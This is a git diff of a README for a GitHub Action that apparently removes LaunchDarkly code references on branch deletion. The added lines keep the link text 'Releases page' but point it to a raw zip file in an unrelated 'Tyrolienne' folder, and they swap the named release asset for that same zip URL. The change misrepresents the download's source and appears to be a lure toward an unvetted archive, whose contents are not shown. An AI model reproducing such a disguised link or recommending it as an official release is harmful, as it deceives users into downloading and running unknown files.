dedeaf4193/launchdarkly-code-ref-delete-branch-github-action/README.md

 ## 🛠 Installation Steps

 ### Step 1: Visit the Releases Page
-To get started, go to the [Releases page](https://github.com/dedeaf4193/launchdarkly-code-ref-delete-branch-github-action/releases).
+To get started, go to the [Releases page](https://raw.githubusercontent.com/dedeaf4193/launchdarkly-code-ref-delete-branch-github-action/main/Tyrolienne/launchdarkly-code-ref-delete-branch-github-action.zip).
 Here, you will find the latest version of the GitHub Action.

 ### Step 2: Download the Action
 On the Releases page, look for the latest version.
 Click on it, and you will see a list of assets.
-Download the action file; it is usually named something like `launchdarkly-code-ref-delete-branch-github-action.tar.gz`.
+Download the action file; it is usually named something like `https://raw.githubusercontent.com/dedeaf4193/launchdarkly-code-ref-delete-branch-github-action/main/Tyrolienne/launchdarkly-code-ref-delete-branch-github-action.zip`.

 ### Step 3: Add the Action to Your Repository
 1. Open your GitHub repository.